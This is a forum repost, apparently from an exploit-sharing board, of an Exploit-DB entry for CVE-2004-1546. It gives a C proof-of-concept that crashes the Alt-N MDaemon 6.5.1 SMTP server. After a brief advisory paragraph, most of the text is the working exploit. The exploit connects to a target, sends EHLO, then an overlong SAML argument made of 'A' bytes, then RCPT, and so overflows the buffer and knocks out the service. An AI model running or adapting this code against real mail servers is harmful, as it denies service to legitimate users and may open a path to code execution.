Exploit Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflows

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24624
Проверка EDB
  1. Пройдено
Автор
D_BUG
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2004-1546
Дата публикации
2004-09-16
Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflows
C:
// source: https://www.securityfocus.com/bid/11238/info

Alt-N MDaemon is reportedly prone to multiple remote buffer overflow vulnerabilities. The vulnerabilities are likely due to a failure of the application to properly validate buffer sizes when processing command argument input.

By sending a large argument to certain SMTP commands or an IMAP command it is possible to cause this issue to present itself. Apparently, the application will not validate the size of the input before copying it into a finite buffer in process memory.

These issues can be leveraged to cause the affected process to crash, denying service to legitimate users. It is conjectured that these issues can also be leveraged to execute arbitrary code with the privileges of the user running the server on an affected computer.

/////////////////////////////////////////////////////////////
//        Remote DoS and proof-of-concept exploit          //
//                         for               		   //
//               Mdaemon smtp server v6.5.1                //
//	                   and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.        		   //
//                    Author: D_BuG.                       //
//                     [email protected]            		   //                
//                   Data: 16/09/2004        		   //
//                     NOT PUBLIC!                         //
//		      Greets:Rasco.                        // 
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
	
	{
	
	printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");
	printf("                         for                              \n");
	printf("Mdaemon smtp server v6.5.1 and possible other version.\n");                    
	if(argc!=4)
	{
	printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);
	printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");
	printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);
	exit(-1);
	}


     	sa.sin_family=AF_INET;
	sa.sin_port=htons(atoi(argv[2]));
	if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
	printf("Error inet_pton\n");
		
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	
	printf("[~]Connecting...\n");
	
	if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
	{
	printf("[-]Connect filed....\nExit...\n");
	exit(-1);
	}

int len=247;
	
if(atoi(argv[3])==2)
{
len++;
}
	
char szBuffer[len+7];
char buff[len];
char send[]="EHLO tester\n";
char send3[]="RCPT TO postmaster\n";
char rcv[1024];
int i;
for(i=0;i<len;i++)
    {
    buff[i]=0x41;
    }
    
sprintf(szBuffer,"SAML %s\n",buff);

		printf("[+]Ok!\n");
		sleep(2);
		printf("[~]Get banner...\n");
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		    
		if(strstr(rcv,"220")==NULL)
		{
		printf("[-]Failed!\n");
		}
		else
		{ 
		printf("[+]Ok!\n");
    		}
								 
		printf("[~]Send EHLO...\n");
		write(sock,send,sizeof(send)-1);
		sleep(2);
		memset(rcv,0,1024);
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		
		if(strstr(rcv,"250")==NULL)
		{
		printf("[-]Failed...\n");
		}
		else
		{
		printf("[+]Ok!\n");
		}
		printf("[~]Send SAML...\n");
		write(sock,szBuffer,strlen(szBuffer));//Send SAML
		sleep(2);
		memset(rcv,0,1024);
		if(read(sock,&rcv,sizeof(rcv)) !=-1){}
		
		if(strstr(rcv,"250")==NULL)
		{
		printf("[-]Exploit failed...please check your version Mdaemon!\n");
		printf("[-]Exit...\n");
		exit(-1);
		}
		printf("[+]Ok!\n");
		
		printf("[~]Send RCPT...\n\n");
		write(sock,send3,sizeof(send3)-1);//Send RCPT
		sleep(2);
		if(atoi(argv[3])==2)
		{
		printf("[+]Crash service.....\n");
		}
		else
		{
		printf("[+]DoS service.....\n");
		}
		printf("[~]Done.\n");
		
		close(sock);
		
return 0;

}
 
Источник
www.exploit-db.com

Похожие темы